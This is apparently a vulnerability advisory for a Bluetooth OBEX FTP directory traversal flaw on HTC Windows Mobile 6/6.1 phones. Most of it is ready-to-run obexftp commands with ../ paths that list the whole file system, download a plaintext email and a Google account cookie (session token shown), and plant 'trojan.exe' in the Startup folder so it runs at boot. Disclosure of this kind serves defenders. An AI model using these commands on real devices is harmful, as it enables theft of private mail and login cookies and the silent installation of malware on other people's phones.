Title: HTC / Windows Mobile OBEX FTP Service Directory Traversal |
Summary
HTC devices running Windows Mobile 6 and Windows Mobile 6.1 are prone to a directory traversal vulnerability in the Bluetooth OBEX FTP Service. Exploiting this issue allows a remote authenticated attacker to list arbitrary directories, and write or read arbitrary files, via a ../ in a pathname. This can be leveraged for code execution by writing to a Startup folder.
Description
In the present HTC / Windows Mobile phones are shipped with a Bluetooth stack, which provides Bluetooth communications with other remote devices. File Transfer Profile (OBEX FTP) is one among all the Bluetooth services that may be implemented in the stack.
The following example is the output of a command for finding near devices supporting the File Transfer Profile (FTP) with sdptool, a tool available in Linux from kernel versions 2.4.6. Given the known profile name FTP, the command searches for Bluetooth devices nearby and inquires whether the File Transfer Profile (FTP) is supported.
|
gospel@ubuntu:~$ sdptool search FTP Inquiring ... Searching for FTP on 00:17:83:02:BA:3C ... Service Name: FTP Service RecHandle: 0x10006 Service Class ID List: "OBEX File Transfer" (0x1106) Protocol Descriptor List: "L2CAP" (0x0100) "RFCOMM" (0x0003) Channel: 2 "OBEX" (0x0008) Language Base Attr List: code_ISO639: 0x656e encoding: 0x6a base_offset: 0x100 Profile Descriptor List: "OBEX File Transfer" (0x1106) Version: 0x0100 |
The OBEX FTP Service
The OBEX FTP service can be used to share files over the Bluetooth wireless communications protocol. This service can be used for sending files from the phone to other remote devices but also allows remote devices to browse shared folders and download files from the phone.
The OBEX FTP service installed in Windows Mobile phones is accessible from a PC by using an OBEX FTP client, such as ObexFTP or gnomevfs-ls for Linux, for instance.
The following example is the output of a command for listing a directory with ObexFTP. Given the Bluetooth MAC address of the mobile phone and no path or default path /, the command retrieves the content of the default directory of the FTP server.
|
gospel@ubuntu:~$ obexftp -b 00:17:83:02:BA:3C -l Browsing 00:17:83:02:BA:3C ... Connecting..\done Tried to connect for 26ms Receiving "(null)"...|<?xml version="1.0"?> <!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd"> <folder-listing version="1.0"> <parent-folder name="" /> <file name="foto.jpg" created="20090304T042644Z" size="134680"/> <file name="nota.pwi" created="20090304T043402Z" size="524"/> </folder-listing> done Disconnecting../done |
The following example is the output of a command for downloading a file with ObexFTP. Given the Bluetooth MAC address of the mobile phone and the path-name nota.pwi the command retrieves the file.
|
gospel@ubuntu:~$ obexftp -b 00:17:83:02:BA:3C -g nota.pwi Browsing 00:17:83:02:BA:3C ... Connecting..\done Tried to connect for 28ms Receiving "nota.pwi"...-done Disconnecting..\done gospel@ubuntu:~$ ls bluez Documents Pictures nota.pwi Videos Desktop Downloads Music Public Templates |
The FTP service is configured in such a way that a specific directory is shared and the user can place here files to be shared. The default directory is My Device\My Documents\Bluetooth Share (in the English edition) or My Device\My Documents\Compartimiento de Bluetooth (in the Spanish edition). A different directory may be selected; however the user is not allowed to specify any directory of the filesystem out of My Device\My Documents\ or Memory Card\ paths. This is for safety reasons, so users cannot expose sensitive files over Bluetooth.
The OBEX FTP Service Directory Traversal vulnerability
There exists a Directory Traversal vulnerability in the OBEX FTP Service in the Bluetooth Stack implemented in HTC devices running Windows Mobile 6 and Windows Mobile 6.1. The OBEX FTP server is located in \Windows\obexfile.dll. Microsoft states this is a 3rd party driver developed by HTC and installed on HTC devices running Windows Mobile, so the vulnerability affects to this vendor specifically.
A remote attacker (who previously owned authentication and authorization rights) can use tools like ObexFTP or gnomevfs-ls over Linux to traverse to parent directories out of the default Bluetooth shared folder by using ../ or ..\\ marks.
The following example is the output of a command for listing a directory with ObexFTP. Given the Bluetooth MAC address of an HTC / Windows Mobile based mobile phone and the path ../../, the command retrieves the content of the parent of the default directory of the FTP server, this is the root directory of the disk file system.
|
gospel@ubuntu:~$ obexftp -b 00:17:83:02:BA:3C -l "../../" Browsing 00:17:83:02:BA:3C ... Connecting..\done Tried to connect for 31ms Receiving "../../"... Sending ".."...|Sending "..".../done \<?xml version="1.0"?> <!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd"> <folder-listing version="1.0"> <parent-folder name=".." /> <folder name="Documents and Settings" created="20081021T030002Z"/> <folder name="Windows" created="20081021T030004Z"/> <folder name="Temp" created="20081021T030004Z"/> <folder name="My Documents" created="20081021T030012Z"/> <folder name="Program Files" created="20081021T030012Z"/> <file name="mxip_initdb.vol" created="20081020T182204Z" size="53248"/> <file name="mxip_notify.vol" created="20080818T224126Z" size="32768"/> <file name="mxip_swmgmt.vol" created="20080818T224130Z" size="135168"/> <file name="mxip_system.vol" created="20080818T224128Z" size="155648"/> <file name="mxip_lang.vol" created="20080818T224128Z" size="53248"/> <folder name="Application Data" created="20081021T030032Z"/> <folder name="ConnMgr" created="20081021T030056Z"/> <file name="cemail.vol" created="20081021T030312Z" size="163840"/> <file name="pim.vol" created="20081021T030340Z" size="323584"/> </folder-listing> done Disconnecting..|done |
Requirements to exploit the vulnerability
The only requirement is that the attacker must have authentication and authorization privileges over Bluetooth. Pairing up with the remote device should be enough to get it; however, more sophisticated attacks, such as sniffing the Bluetooth pairing, linkkey cracking and MAC address spoofing, can be used in order to avoid this. In case the attacker succeeded in getting the proper privileges, further actions will be transparent to the user.
Devices must have Bluetooth enabled and File Sharing over Bluetooth service active when the attack is performed.
Scope of the attack
The Directory Traversal vulnerability allows the attacker to traverse to parent directories out of the default Bluetooth shared folder by using ../ or ..\\ marks. This security flaw leads to browse folders located anywhere in the file system, download files contained in any folder as well as upload files to any folder.
1) Browse directories located out of the limits of the default shared folder
An attacker can discover the structure of the device file system and access to any directory, including:
- The flash hard drive
- The external storage card
- The internal mass storage memory, included in devices like HTC TOUCH™ DIAMOND
The following example is the output of a command for listing a directory with ObexFTP. Given the Bluetooth MAC address of an HTC / Windows Mobile based mobile phone and the path ../../My Documents/, the command retrieves the content of the directory /My Documents/ in the disk file system. This directory often stores user's personal files such as pictures, videos, documents.
|
gospel@ubuntu:~$ obexftp -b 00:17:83:02:BA:3C -l "../../My Documents/" Browsing 00:17:83:02:BA:3C ... Connecting..\done Tried to connect for 29ms Receiving "../../My Documents/"... Sending ".."...|Sending "..".../Sending "My Documents"...-done \<?xml version="1.0"?> <!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd"> <folder-listing version="1.0"> <parent-folder name="My Documents" /> <folder name="Mis imagenes" created="20081021T030012Z"/> <folder name="Mis videos" created="20081021T030012Z"/> <folder name="Personal" created="20081021T030014Z"/> <folder name="Mi musica" created="20081021T030014Z"/> <folder name="Templates" created="20081021T030014Z"/> <folder name="UAContents" created="20081021T030014Z"/> <folder name="Plantillas" created="20081021T030434Z"/> <folder name="Llamadas" created="20081021T030434Z"/> <folder name="Compartimiento de Bluetooth" created="20090131T070342Z"/> </folder-listing> done Disconnecting..|done |
The following example is the output of a command for listing a directory with ObexFTP. Given the Bluetooth MAC address of an HTC / Windows Mobile based mobile phone and the path ../../Tarjeta de Almacen./My Documents/, the command retrieves content from the external storage card, which usually stores user's private data.
|
gospel@ubuntu:~$ obexftp -b 00:17:83:02:BA:3C -l "../../Tarjeta de Almacen./My Documents/" Browsing 00:17:83:02:BA:3C ... Connecting..\done Tried to connect for 43ms Receiving "../../Tarjeta de Almacen./My Documents/"... Sending ".."...|Sending "..".../done -<?xml version="1.0"?> <!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd"> <folder-listing version="1.0"> <parent-folder name="My Documents" /> <folder name="Mis imagenes" created="16010101T000000Z"/> <folder name="Mis videos" created="16010101T000000Z"/> <folder name="Mis temas" created="16010101T000000Z"/> <folder name="Mis CABs" created="16010101T000000Z"/> <folder name="Mis cosas privadas" created="16010101T000000Z"/> <folder name="Mis POI" created="16010101T000000Z"/> </folder-listing> done Disconnecting..\done |
Indeed the file system can be browsed through with Nautilus file explorer...
2) Download files without permission
An attacker can download sensitive files located anywhere in the file system, such as:
- personal pictures and documents located in \My Documents or any other directory
- emails located in \Windows\Messaging
The following example is the output of commands for listing a directory and reading a file with ObexFTP. Given the Bluetooth MAC address of an HTC / Windows Mobile based mobile phone and the path ../../Windows/Messaging/, the command retrieves the content of the directory where emails from the Outlook application are stored. Emails are stored in plain text, therefore these can be read remotely.
gospel@ubuntu:~$ obexftp -b 00:21:BA:D4:72:28 -l "../../Windows/Messaging/"
Browsing 00:21:BA:D4:72:28 ...
Connecting..\done
Tried to connect for 33ms
Receiving "../../Windows/Messaging/"... Sending ".."...|Sending "..".../Sending "Windows"...-Sending "Messaging"...\done
|<?xml version="1.0"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
<parent-folder name="Messaging" />
<folder name="Attachments" created="20081021T030312Z"/>
<file name="9634000081030102.mpb" created="20101020T014408Z" size="1585"/>
<file name="9c31000081030102.mpb" created="20090304T035018Z" size="2462"/>
<file name="a935000081030102.mpb" created="20090304T035026Z" size="2910"/>
<file name="ad37000081030102.mpb" created="20090304T035030Z" size="2494"/>
<file name="9132000081030102.mpb" created="20101020T014408Z" size="3596"/>
</folder-listing>
done
Disconnecting../done
gospel@ubuntu:~$ obexftp -b 00:21:BA:D4:72:28 -l "../../Windows/Messaging/9634000081030102.mpb"
Browsing 00:21:BA:D4:72:28 ...
Connecting..\done
Tried to connect for 475ms
Receiving "../../Windows/Messaging/9634000081030102.mpb"... Sending ".."...|Sending "..".../Sending "Windows"...-Sending "Messaging"...\done
/Return-Path: <jean-luc@email.jp>
X-Original-To: alberto@cipher.risk.*******.ac.jp
Delivered-To: alberto@cipher.risk.*******.ac.jp
Received: by server.*******.ac.jp (Postfix) with ESMTP id E20848AFE76
for <alberto@cipher.risk.*******.ac.jp>; Wed, 20 Oct 2010 10:30:12 +0900 (JST)
Message-ID: <12345.2010601@*******.ac.jp>
Date: Wed, 20 Oct 2010 10:42:23 +0900
From: Jean-Luc <jean-luc@email.jp>
Reply-To: jean-luc@email.jp
User-Agent: Mozilla/5.0
MIME-Version: 1.0
To: alberto@cipher.risk.*******.ac.jp
Subject: Test
X-Enigmail-Version: 1.1.1
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Hi Alberto,
Here is a short message ;)
Jean-Luc
done
Disconnecting..-done - Temporary internet cache and cookies located in \Windows\Profiles\guest\
The following example is the output of commands for listing a directory and reading a file with ObexFTP. Given the Bluetooth MAC address of an HTC / Windows Mobile based mobile phone and the path ../../Windows/Profiles/Guest/Cookies/, the command retrieves the content of the directory where cookies from the Internet Explorer application are stored. Cookies are stored in plain text, therefore these can be read remotely.
gospel@ubuntu:~$ obexftp -b 00:21:BA:D4:72:28 -l "../../Windows/Profiles/Guest/Cookies"
Browsing 00:21:BA:D4:72:28 ...
Connecting..\done
Tried to connect for 28ms
Receiving "../../Windows/Profiles/Guest/Cookies"... Sending ".."...|Sending "..".../Sending "Windows"...-Sending "Profiles"...\Sending "Guest"...|done
/<?xml version="1.0"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
<parent-folder name="Guest" />
<file name="index.dat" created="20081021T030040Z" size="32768"/>
<file name="guest@verify[1].txt" created="20101020T041656Z" size="131"/>
<file name="guest@verify[2].txt" created="20101020T040958Z" size="133"/>
<file name="guest@google.co[2].txt" created="20101020T042802Z" size="899"/>
<file name="guest@google[2].txt" created="20101020T042802Z" size="1050"/>
<file name="guest@calendar[1].txt" created="20101020T042758Z" size="321"/>
<file name="guest@accounts[3].txt" created="20101020T042812Z" size="373"/>
<file name="guest@accounts[2].txt" created="20101020T042802Z" size="429"/>
</folder-listing>
done
Disconnecting..-done
gospel@ubuntu:~$ obexftp -b 00:21:BA:D4:72:28 -l "../../Windows/Profiles/Guest/Cookies/guest@accounts[2].txt"
Browsing 00:21:BA:D4:72:28 ...
Connecting..\done
Tried to connect for 34ms
Receiving "../../Windows/Profiles/Guest/Cookies/guest@accounts[2].txt"... Sending ".."...|Sending "..".../Sending "Windows"...-Sending "Profiles"...
\Sending "Guest"...|Sending "Cookies".../done
-LSID
cl|s.JP:DQAAAKcAAAAYF_ib2DAWOSLAxaWV4gswBEsiPWnCg3TkH1K4Ku4auJs13nItoUDJr6cANVK2RSEN8bwObv3Ih
LmBpOytKpafSc9QIV3zuGS0cQdQ0V5XO5GMH0uBFrWXZuHm8gK6GYWHKZP31WJIkR0cZNyTCqCecSfFJI40QyFLqR1HTh
fJxqzmO9UCTdwQPJrHGaK1053qGUxofQTzSRsH-8PRhbBieoGBcSTLk-cKamdvao_5Q
www.google.com/accounts
1024
4036031360
30843965
792988544
30109711
*
GAUSR
***********@gmail.com
www.google.com/accounts
1024
3913696030
33960845
758542984
30971101
*
done
Disconnecting..\done
3) Upload malicious files
Since it is possible to upload files to the file system, exploiting this issue may lead to code execution. An attacker can replace system .exe files with malicious files or upload trojans to any place in the file system, such as \Windows\Startup (\Windows\Inicio in the Spanish edition) and therefore shall be executed the next time Windows Mobile inits.
The following example is the output of commands for uploading a file and listing the destination directory with ObexFTP. Given the Bluetooth MAC address of an HTC / Windows Mobile based mobile phone and the pathname ..\..\Windows\Inicio, the command uploads the file to the startup folder of Windows Mobile and it shall be executed the next time the operating system inits.
|
gospel@ubuntu:~$ obexftp -b 00:17:83:02:BA:3C -c "../../Windows/Inicio" -p trojan.exe Browsing 00:17:83:02:BA:3C ... Connecting..\done Tried to connect for 20ms Sending ".."...|Sending "..".../Sending "Windows"...-Sending "Inicio"...\done Sending "trojan.exe"...|done Disconnecting../done gospel@ubuntu:~$ obexftp -b 00:17:83:02:BA:3C -l "../../Windows/Inicio" Browsing 00:17:83:02:BA:3C ... Connecting..\done Tried to connect for 37ms Receiving "../../Windows/Inicio"... Sending ".."...|Sending "..".../Sending "Windows"...-done \<?xml version="1.0"?> <!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd"> <folder-listing version="1.0"< <parent-folder name="Windows" /> <file name="poutlook.lnk" created="20081021T030014Z" size="14"/> <file name="trojan.exe" created="20101025T082104Z" size="11"/> </folder-listing> done Disconnecting..|done |
